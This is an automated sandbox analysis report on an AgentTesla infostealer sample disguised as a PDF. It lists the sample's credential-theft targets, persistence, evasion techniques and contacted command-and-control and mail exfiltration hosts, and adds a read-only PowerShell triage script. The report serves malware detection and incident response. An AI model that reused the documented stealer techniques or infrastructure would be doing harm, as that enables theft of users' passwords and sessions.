                      Source: Yara match | File source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.3855070.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.380fa50.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.3855070.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.380fa50.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.NewApp.exe.42ac090.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.NewApp.exe.42f16b0.7.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara match | File source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY

                      Remote Access Functionality:

                      Yara detected AgentTesla
                      Source: Yara match | File source: 0000001F.00000002.811192969.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.833553760.00000000042AC000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.702719345.000000000442A000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.915676599.0000000002898000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.915637033.0000000002DFA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.912000692.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000018.00000002.911999717.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000013.00000002.832293360.000000000380F000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 7040, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 2092, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: A4-058000200390-10-14_REV_pdf.exe PID: 1572, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 6416, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: NewApp.exe PID: 1216, type: MEMORY
                      Source: Yara match | File source: 18.2.NewApp.exe.42f16b0.7.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 31.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.NewApp.exe.42ac090.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.A4-058000200390-10-14_REV_pdf.exe.4470150.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.3855070.8.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.A4-058000200390-10-14_REV_pdf.exe.442ab30.9.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 24.2.NewApp.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.380fa50.6.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.3855070.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 19.2.NewApp.exe.380fa50.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.NewApp.exe.42ac090.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 18.2.NewApp.exe.42f16b0.7.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

Columns are the ATT&CK tactics; a trailing number on a technique name is the report's signature-count badge for that technique.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Registry Run Keys / Startup Folder 1 | Process Injection 112 | Disable or Modify Tools 1 | OS Credential Dumping 2 | File and Directory Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 1 | Obfuscated Files or Information 1 | Input Capture 211 | System Information Discovery 114 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing 1 | Credentials in Registry 1 | Query Registry 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Timestomp 1 | NTDS | Security Software Discovery 431 | Distributed Component Object Model | Input Capture 211 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 25 | SSH | Clipboard Data 1 | Data Transfer Size Limits | Application Layer Protocol 112 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 25 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 112 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

Behavior Graph ID: 356536
Sample: A4-058000200390-10-14_REV_pdf.exe
Start date: 23/02/2021
Architecture: WINDOWS
Score: 100

Signatures attached to the start node:

• Found malware configuration
• Multi AV Scanner detection for submitted file
• Yara detected AgentTesla
• 3 other signatures

Process tree, rebuilt from the graph edges. Each indented entry was started by the entry above it; bracketed numbers are the per-process counters the graph legend labels "Number of created Registry Values" and "Number of created Files", in that order.

NewApp.exe [14 / 3]
    signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Contains functionality to register a low level keyboard hook
    NewApp.exe
        signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
    cmd.exe
        conhost.exe
        timeout.exe
    WerFault.exe

A4-058000200390-10-14_REV_pdf.exe [15 / 3]
    network: coroloboxorozor.com 104.21.71.230 (ports 49734, 49753, 49764; CLOUDFLARENETUS, United States); 192.168.2.1 (unknown)
    signatures: Hides threads from debuggers; Injects a PE file into a foreign processes; Contains functionality to hide a thread from the debugger
    A4-058000200390-10-14_REV_pdf.exe [2 / 9]
        network: mail.soonlogistics.com 103.17.211.69 (ports 49763, 49765, 49775; IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY, Malaysia)
        dropped: C:\Users\user\AppData\Roaming\...\NewApp.exe (PE32); C:\Users\user\...\NewApp.exe:Zone.Identifier (ASCII)
        signatures: Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
    cmd.exe [1]
        conhost.exe
        timeout.exe [1]
    WerFault.exe [23 / 9]

NewApp.exe
    cmd.exe
        conhost.exe
        timeout.exe
    NewApp.exe
    WerFault.exe

Screenshots

(Screenshot thumbnails are not reproduced in this text version.)

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
A4-058000200390-10-14_REV_pdf.exe | 13% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\NewApp\NewApp.exe | 13% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

Source | Detection | Scanner | Label
31.2.NewApp.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
24.2.NewApp.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8
8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

                      Domains

Source | Detection | Scanner | Label
coroloboxorozor.com | 0% | Virustotal | (none)

                      URLs

Source | Detection | Scanner | Label
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
http://mail.soonlogistics.com | 0% | Avira URL Cloud | safe
http://coroloboxorozor.com/base/BE0C9BE287721D2E1639C8881BC9F105.html | 0% | Avira URL Cloud | safe
http://2nUtGMgnxihCA8N2g.org | 0% | Avira URL Cloud | safe
http://r3.o.lencr.org0 | 0% | URL Reputation | safe
http://r3.o.lencr.org0 | 0% | URL Reputation | safe
http://r3.o.lencr.org0 | 0% | URL Reputation | safe
http://coroloboxorozor.com | 0% | Avira URL Cloud | safe
http://coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.html | 0% | Avira URL Cloud | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe
http://r3.i.lencr.org/0 | 0% | URL Reputation | safe
http://r3.i.lencr.org/0 | 0% | URL Reputation | safe
http://r3.i.lencr.org/0 | 0% | URL Reputation | safe

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
coroloboxorozor.com | 104.21.71.230 | true | false | (none) | unknown
mail.soonlogistics.com | 103.17.211.69 | true | true | (none) | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://coroloboxorozor.com/base/BE0C9BE287721D2E1639C8881BC9F105.html | false | Avira URL Cloud: safe | unknown
http://2nUtGMgnxihCA8N2g.org | true | Avira URL Cloud: safe | unknown
http://coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.html | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://cps.letsencrypt.org0 | A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmp | false | URL Reputation: safe (4 reports) | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://mail.soonlogistics.com | A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.916340708.0000000002FFB000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916097296.0000000002A24000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://r3.o.lencr.org0 | A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmp | false | URL Reputation: safe (3 reports) | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://coroloboxorozor.com | A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20 | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/ | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://cps.root-x1.letsencrypt.org0 | A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmp | false | URL Reputation: safe (3 reports) | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication | WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmp | false | (none) | high
http://r3.i.lencr.org/0 | A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmp | false | URL Reputation: safe (3 reports) | unknown

                                                    Contacted IPs


                                                    Public

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.71.230 | unknown | United States | 13335 | CLOUDFLARENETUS | false
103.17.211.69 | unknown | Malaysia | 45352 | IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY | true

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:356536
                                                    Start date:23.02.2021
                                                    Start time:09:46:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 14m 14s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:A4-058000200390-10-14_REV_pdf.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:37
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@27/16@6/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 0% (good quality ratio 0%)
                                                    • Quality average: 0%
                                                    • Quality standard deviation: 0%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 92.122.145.220, 52.147.198.201, 13.64.90.137, 51.104.139.180, 52.155.217.156, 20.54.26.129, 67.26.83.254, 8.248.117.254, 8.248.143.254, 8.253.95.120, 8.248.119.254, 92.122.213.247, 92.122.213.194, 104.43.193.48, 40.88.32.150, 51.104.144.132
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

Time | Type | Description
09:47:13 | API Interceptor | 3x Sleep call for process: WerFault.exe modified
09:47:15 | API Interceptor | 608x Sleep call for process: A4-058000200390-10-14_REV_pdf.exe modified
09:47:24 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NewApp C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
09:47:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NewApp C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
09:48:11 | API Interceptor | 282x Sleep call for process: NewApp.exe modified
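The two Autostart rows above record the persistence this sample installs: a Run value named NewApp under HKCU pointing at a copy of itself in %APPDATA%\NewApp, with the Zone.Identifier stream stripped from that copy (see the "Hides that the sample has been downloaded from the Internet" signature). The following PowerShell is an added triage check for that pattern on a live host; it is not part of the Joe Sandbox report and not code from the sample. It assumes the list of user-writable directories and the registry keys enumerated are the ones worth checking, and reads only, so it is safe to run on a suspect machine before any remediation.

```powershell
# Added example (not from the Joe Sandbox report): list Run-key autostarts whose
# target lives in a user-writable directory, and for each report whether the
# binary still carries a Zone.Identifier stream, its Authenticode status and
# its SHA256 so the hash can be compared against the report's indicators.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
)

# Assumption: these are the user-writable roots a legitimate autostart rarely
# uses. The sample's own drop location, %APPDATA%\NewApp, falls under the first.
$userWritable = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP, "$env:USERPROFILE\Downloads")

function Get-AutorunTarget {
    # Reduce a Run value such as  "C:\x\y.exe" /arg  or  C:\x\y.exe /arg  to the executable path.
    param([string]$Value)
    if ($Value -match '^"([^"]+)"') { return $Matches[1] }
    return ($Value -split '\s+')[0]
}

function Test-ZoneIdentifier {
    # True when the file carries a Zone.Identifier alternate data stream,
    # i.e. the mark-of-the-web a browser or mail client writes on download.
    param([string]$Path)
    $streams = Get-Item -LiteralPath $Path -Stream * -ErrorAction SilentlyContinue
    return [bool]($streams | Where-Object { $_.Stream -eq 'Zone.Identifier' })
}

foreach ($key in $runKeys) {
    if (-not (Test-Path $key)) { continue }
    $props = Get-ItemProperty -Path $key
    foreach ($p in $props.PSObject.Properties) {
        # Get-ItemProperty adds PSPath/PSParentPath/... metadata; skip those.
        if ($p.Name -like 'PS*') { continue }

        $target = Get-AutorunTarget ([string]$p.Value)
        $suspiciousDir = $userWritable | Where-Object { $_ -and $target.StartsWith($_, 'OrdinalIgnoreCase') }
        if (-not $suspiciousDir) { continue }

        if (Test-Path -LiteralPath $target) {
            $zone = if (Test-ZoneIdentifier $target) { 'present' } else { 'absent' }
            $sig  = (Get-AuthenticodeSignature -LiteralPath $target).Status
            $hash = (Get-FileHash -LiteralPath $target -Algorithm SHA256).Hash
        } else {
            $zone = 'n/a'; $sig = 'file missing'; $hash = $null
        }

        [pscustomobject]@{
            Key       = $key
            Name      = $p.Name        # the report shows "NewApp" here
            Target    = $target        # the report shows ...\AppData\Roaming\NewApp\NewApp.exe
            Zone      = $zone          # "absent" on a dropped copy is consistent with this sample
            Signature = $sig
            SHA256    = $hash
        }
    }
}
```

An autostart under %APPDATA% with no Zone.Identifier stream and an unsigned binary is not proof of infection on its own, but it matches the exact combination this report records, and the SHA256 column lets the file be checked against the hashes and detections listed above. Delete nothing from this script; removal of the Run value and the file belongs to the incident response process, after the binary has been preserved for analysis.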

                                                    Joe Sandbox View / Context

                                                    IPs

Match: 104.21.71.230

Associated Sample Name / URL | Detection | Context
Purchase_order_397484658464974945648447564845.exe | malicious | coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html
0603321WG_0_1 pdf.exe | malicious | coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
VIws8bzjD5.exe | malicious | coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
quotation_PR # 00459182..exe | malicious | coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
PURCHASE ORDER CONFIRMATION.exe | malicious | coroloboxorozor.com/base/13F70A6846505248D031FD970E34143C.html
PAYRECEIPT.exe | malicious | coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
New Order.exe | malicious | coroloboxorozor.com/base/787C0D9D971EA648C79BB43D6A91B32D.html
TT.exe | malicious | coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
Payment_pdf.exe | malicious | coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
TT.exe | malicious | coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
purchase order 1.exe | malicious | coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html
telex transfer.exe | malicious | coroloboxorozor.com/base/EB6932098F110FB9EB9C8B27A1730610.html
ORDER PURCHASE ITEMS.exe | malicious | coroloboxorozor.com/base/20872932CF927ACBA3BF36E6C823C99C.html
Doc_3975465846584657465846486435454,pdf.exe | malicious | coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html
CV-JOB REQUEST______pdf.exe | malicious | coroloboxorozor.com/base/38A59769F794F78901E2621810DAAA3A.html
